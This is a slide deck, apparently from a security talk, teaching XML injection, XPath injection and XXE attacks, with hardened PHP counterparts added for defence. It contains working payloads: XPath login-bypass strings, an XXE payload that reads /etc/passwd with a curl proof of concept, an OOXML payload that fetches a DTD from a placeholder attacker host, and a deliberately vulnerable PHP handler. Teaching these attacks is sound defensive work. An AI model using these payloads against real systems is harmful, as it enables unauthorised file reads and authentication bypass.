Hands-on XML Attacks
Presented by
Toe Khaing Oo
About Me
➢ Student at UCSY
➢ Programmer
➢ Security Enthusiast
➢ Contributor at OWASP Myanmar
➢ Organizer at Myanmar Cyber Conference
What is XML?
● Extensible Markup Language (XML)
● Textual data format
● Focused on documents
● Used to annotate text or add additional information
● Relies on a Document Type Definition (DTD)
XML Structure
● XML Header (Document Type Definition – DTD)
<?xml version="1.0" encoding="ISO-8859-1"?>
● Elements
<item>
<itemId> 1 </itemId>
<itemName> Book </itemName>
</item>
Types of XML vulnerabilities
● XML Injection (tag injection)
● XPath Injection
● XML External Entities (XXE)
XML Injection
● Inject XML into the application; the attack works when the XML parser fails to validate the data
● Insert XML characters, tags, methods, etc.
● Possible to inject XML data and tags into an XML database
● Possible to test with a single quote ' when input is not sanitized
Example: <username attrib='$usernameInput' /> becomes, when a single quote is appended,
<username attrib='admin'' />
Detection for XML Injection
' Single quote
" Double quote
Testing for XML Injection
● Different attack surfaces: input fields such as user registration, update information and so on
● Both GET and POST parameters
● Use escape characters to invalidate the XML document
Exploitation for XML Injection
● Supply a new value for an existing element
<username> Toe </username>
● Use a comment tag <!-- Tag --> to comment out the original element
<!-- username --> <username>Toe</username>
● CDATA section delimiters
<username><![CDATA[<$userName]]></username>
<![CDATA[<]]>script<![CDATA[>]]>alert('xss')<![CDATA[<]]>/script<![CDATA[>]]>
Example Code
<book>
<id> 102 </id>
<bookName> Sherlock </bookName>
<price> 200 </price>
</book>
When a user buys a book from the store, the URL may be
http://shop.com/buy.php?bookID=102&bookName=Sherlock&price=200
When the attacker injects the existing price tag with a new value
http://shop.com/buy.php?bookID=102&bookName=Sherlock&<price>0</price>
the resulting document becomes
<book>
<id> 102 </id>
<bookName> Sherlock </bookName>
<price> 0 </price>
<price> 200 </price>
</book>
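As an added example (not from the slides), the shop scenario above in PHP: an order builder that pastes request parameters into an XML template and so produces the duplicate <price> element, beside a builder that uses DOMDocument so that markup in a value is emitted as text, plus the server-side check a defender would add. The function names, the assumption that the injection arrives through the bookName parameter, and the catalogue lookup are this example's own.

```php
<?php
// Added example (not the slides' code). Shows why string concatenation lets a
// request parameter add a second <price> element, and how building the
// document with DOMDocument and checking it on the server prevents that.
declare(strict_types=1);

// Vulnerable: request parameters are pasted straight into an XML template.
function buildOrderUnsafe(string $bookId, string $bookName, string $price): string
{
    return "<book><id>$bookId</id><bookName>$bookName</bookName><price>$price</price></book>";
}

// Hardened: every value becomes a text node, so '<' and '&' are serialised as
// &lt; and &amp; and can never open or close an element.
function buildOrderSafe(string $bookId, string $bookName, string $price): string
{
    $dom = new DOMDocument('1.0', 'UTF-8');
    $book = $dom->appendChild($dom->createElement('book'));
    foreach (['id' => $bookId, 'bookName' => $bookName, 'price' => $price] as $tag => $value) {
        $el = $dom->createElement($tag);
        $el->appendChild($dom->createTextNode($value));
        $book->appendChild($el);
    }
    return $dom->saveXML($book);
}

// Server-side check: an order must carry exactly one <price>, and that price
// must match the catalogue entry for the book id (assumed lookup table).
// Returns the accepted price, or null when the order is rejected.
function priceFromOrder(string $xml, array $catalogue): ?string
{
    libxml_use_internal_errors(true);            // no warnings on malformed input
    $dom = new DOMDocument();
    if (!$dom->loadXML($xml)) {
        libxml_clear_errors();
        return null;
    }
    $prices = $dom->getElementsByTagName('price');
    $idNode = $dom->getElementsByTagName('id')->item(0);
    if ($prices->length !== 1 || $idNode === null) {
        return null;                             // duplicate or missing element
    }
    $id = trim($idNode->textContent);
    $price = trim($prices->item(0)->textContent);
    return ($catalogue[$id] ?? null) === $price ? $price : null;
}

// Constructed input: the bookName value closes its own element and inserts
// <price>0</price> in front of the legitimate price, as on the slides.
$catalogue = ['102' => '200'];
$injected = 'Sherlock</bookName><price>0</price><bookName>';

$unsafe = buildOrderUnsafe('102', $injected, '200');
echo $unsafe, "\n";                         // two <price> elements, 0 first
var_dump(priceFromOrder($unsafe, $catalogue));   // rejected: price count is 2

$safe = buildOrderSafe('102', $injected, '200');
echo $safe, "\n";                           // injected markup is escaped text
var_dump(priceFromOrder($safe, $catalogue));     // accepted: single price, 200
```

A naive `getElementsByTagName('price')->item(0)` on the unsafe document would return the injected 0, which is exactly why the check counts the elements instead of reading the first one.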
XML Injection Cheat Sheets
https://github.com/toekhaing/xml_attacks/blob/master/xml_injection.txt
XPath Injection
● XPath stands for XML Path Language
● XPath injection is similar to SQL injection
● Another type of XML injection
● Less well known than SQL injection
● Occurs when unsanitized input data is placed into an XPath query over XML data
● Possible to retrieve the entire document
Detection for XPath Injection
● ' Single quote
● " Double quote
● ' or 'a'='a
● ' and 'a'='b
● OR 1=1
● AND 1=2
Exploitation for XPath Injection
Common XPath payloads
' or '1'='1
' or 1=1 or '='
]|*|user[@role='admin
"NODENAME" (returns all child nodes named NODENAME)
"//NODENAME" (returns all NODENAME elements in the document)
"NODENAME//SUBNODENAME" (returns all SUBNODENAME elements under NODENAME)
"//NODENAME[NAME='VALUE']" (e.g. VALUE = admin)
Blind XPath Injection
● count(//user/child::node()) - returns the number of nodes
● Find the error by injecting the following code
' or count(parent::*[position()=1])=0 or 'a'='b
' or count(parent::*[position()=1])>0 or 'a'='b
1 or count(parent::*[position()=1])=0
1 or count(parent::*[position()=1])>0
Example Attack & Resources
● Login bypass
http://site.com/login.php?username=admin' or 1=1 or ''='
● Tools
Xcat (https://github.com/orf/xcat)
● Cheat sheets
https://github.com/toekhaing/xml_attacks/blob/master/xpath_Injection.txt
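As an added example (not from the slides), the login bypass above run against a PHP DOMXPath query built by string concatenation, beside the same lookup with a quoting helper that turns any untrusted string into a safe XPath literal. The users document, the helper name xpathLiteral() and the two login functions are this example's own.

```php
<?php
// Added example (not the slides' code). XPath 1.0 has no escape sequence
// inside string literals, so the usual fix is either parameter binding (which
// DOMXPath lacks) or a literal built with concat(), shown here.
declare(strict_types=1);

// Constructed user store.
const USERS_XML = <<<'XML'
<users>
  <user role="admin"><name>admin</name><pass>s3cret</pass></user>
  <user role="member"><name>toe</name><pass>mypass</pass></user>
</users>
XML;

function loadUsers(): DOMXPath
{
    $dom = new DOMDocument();
    $dom->loadXML(USERS_XML);
    return new DOMXPath($dom);
}

// Returns an XPath string literal that is always parsed as data, never as
// query syntax: single or double quotes when the value contains only one
// kind, concat() of single-quoted pieces when it contains both.
function xpathLiteral(string $value): string
{
    if (strpos($value, "'") === false) {
        return "'" . $value . "'";
    }
    if (strpos($value, '"') === false) {
        return '"' . $value . '"';
    }
    $parts = array_map(fn(string $p): string => "'" . $p . "'", explode("'", $value));
    return 'concat(' . implode(', "\'", ', $parts) . ')';
}

// Vulnerable: the predicate is assembled from raw input.
function loginUnsafe(string $name, string $pass): ?string
{
    $hit = loadUsers()->query("//user[name='$name' and pass='$pass']");
    return $hit->length > 0 ? $hit->item(0)->getAttribute('role') : null;
}

// Hardened: the same query with every input wrapped by xpathLiteral().
function loginSafe(string $name, string $pass): ?string
{
    $q = '//user[name=' . xpathLiteral($name) . ' and pass=' . xpathLiteral($pass) . ']';
    $hit = loadUsers()->query($q);
    return $hit->length > 0 ? $hit->item(0)->getAttribute('role') : null;
}

$payload = "' or '1'='1";                  // first entry of the slides' payload list
// Unsafe predicate: name='' or '1'='1' and pass='' or '1'='1' -> always true,
// so the first <user> in document order (admin) is returned.
var_dump(loginUnsafe($payload, $payload));
// Safe predicate: name="' or '1'='1" and pass="' or '1'='1" -> no match.
var_dump(loginSafe($payload, $payload));
// Mixed quotes exercise the concat() branch of the helper.
var_dump(xpathLiteral("a'b\"c"));
```

A query that matches more than one <user> for a single login attempt is worth logging as a tamper signal even after the fix, since it should never happen with well-formed input.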
XML External Entities (XXE)
● A type of injection attack against an application that parses XML input
● Caused by a misconfigured XML parser
● Leads to extraction of sensitive data
● Remote Code Execution (RCE) in some cases
Common XXE Vulnerabilities
● Apache POI
  CVE-2014-3574
  CVE-2014-3529
● docx4j
● OpenXML SDK
● Nokogiri
  CVE-2012-6685
  CVE-2014-3660
● Play Framework XXE
Finding XXE Flaws
● Wide attack surface
● Registration page, login page, file upload, etc.
● Check requests that carry an XML Content-Type
Detection for XXE Vulnerability
● Read local files on the web server by using a SYSTEM entity
<!ENTITY xxe SYSTEM "file:///etc/passwd" >
● Load a remote Document Type Definition (DTD)
<!ENTITY xxe SYSTEM "http://IP:PORT/test.dtd">
● File upload (OOXML)
Upload an XML, DOCX or XLSX file with an embedded XXE payload.
Example Attack
PHP Code
<?php
// Vulnerable configuration: entity loading is enabled and the parser is told
// to substitute entities (LIBXML_NOENT) and load the DTD (LIBXML_DTDLOAD).
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
$dom = new DOMDocument();
$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
$creds = simplexml_import_dom($dom);
$user = $creds->user;
$pass = $creds->pass;
echo "You have logged in as user $user";
?>
Request
<login>
<user>Toe</user>
<pass>mypass</pass>
</login>
Exploitation
Simple XXE payload that reads the local file /etc/passwd
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<login>
<user>&xxe;</user>
<pass>mypass</pass>
</login>
Proof of Concept
$ curl -d @payload.txt http://site.com/login.php
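As an added example (not from the slides), the login handler above rewritten so that the parser never substitutes entities or fetches a DTD, fed with the slides' /etc/passwd payload and with a normal request. The request format is the slides' <login><user/><pass/></login>; the DOCTYPE pre-check, the LIBXML flags used and the function name parseLogin() are this example's own choices.

```php
<?php
// Added example (not the slides' code): hardened counterpart of the
// vulnerable login handler.
declare(strict_types=1);

// Returns [user, pass] for a well-formed login document, or null when the
// document is rejected. Nothing from the document is echoed back.
function parseLogin(string $xml): ?array
{
    // Defence in depth: a login request has no reason to declare a DTD, so
    // refuse any document that contains one before a parser ever sees it.
    if (stripos($xml, '<!DOCTYPE') !== false) {
        return null;
    }

    // Before PHP 8.0 external entity loading had to be switched off here;
    // from 8.0 it is off by default and this call is deprecated.
    if (PHP_VERSION_ID < 80000) {
        libxml_disable_entity_loader(true);
    }
    libxml_use_internal_errors(true);   // collect parse errors instead of warnings

    $dom = new DOMDocument();
    // LIBXML_NONET forbids network access during parsing. The flags the
    // vulnerable handler passed, LIBXML_NOENT (substitute entities) and
    // LIBXML_DTDLOAD (load the external subset), are deliberately absent.
    if (!$dom->loadXML($xml, LIBXML_NONET)) {
        libxml_clear_errors();
        return null;
    }

    $creds = simplexml_import_dom($dom);
    if ($creds === null || $creds->getName() !== 'login'
        || !isset($creds->user) || !isset($creds->pass)) {
        return null;                    // wrong root element or missing fields
    }
    return [(string) $creds->user, (string) $creds->pass];
}

// Constructed inputs: the slides' XXE payload and an ordinary login request.
$xxe = <<<'XML'
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<login><user>&xxe;</user><pass>mypass</pass></login>
XML;
$normal = '<login><user>Toe</user><pass>mypass</pass></login>';

var_dump(parseLogin($xxe));      // rejected by the DOCTYPE check, never parsed
var_dump(parseLogin($normal));   // user name and password as plain strings
```

Rejecting the DOCTYPE up front also covers parameter-entity tricks such as the OOXML payload later in the deck, which a flag-only fix leaves to the parser's judgement.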
Exploiting File Upload XXE (OOXML)
● Insert the XML payload into DOCX (or any other OOXML) files
● Payload
<!DOCTYPE xxe [
<!ENTITY % get SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://YOURIP:8080/payload.dtd" >
%get %dtd;]>
● Tool
https://github.com/BuffaloWill/oxml_xxe
Demonstration
XXE attack demonstration with XXE Lab
https://github.com/jbarone/xxelab
Case Study
Pentester Lab : Play XML Entities
https://www.vulnhub.com/entry/pentester-lab-play-xml-entities,119
Notes & Collections of XML Attacks
https://github.com/toekhaing/xml_attacks
EOF
Thanks for your attention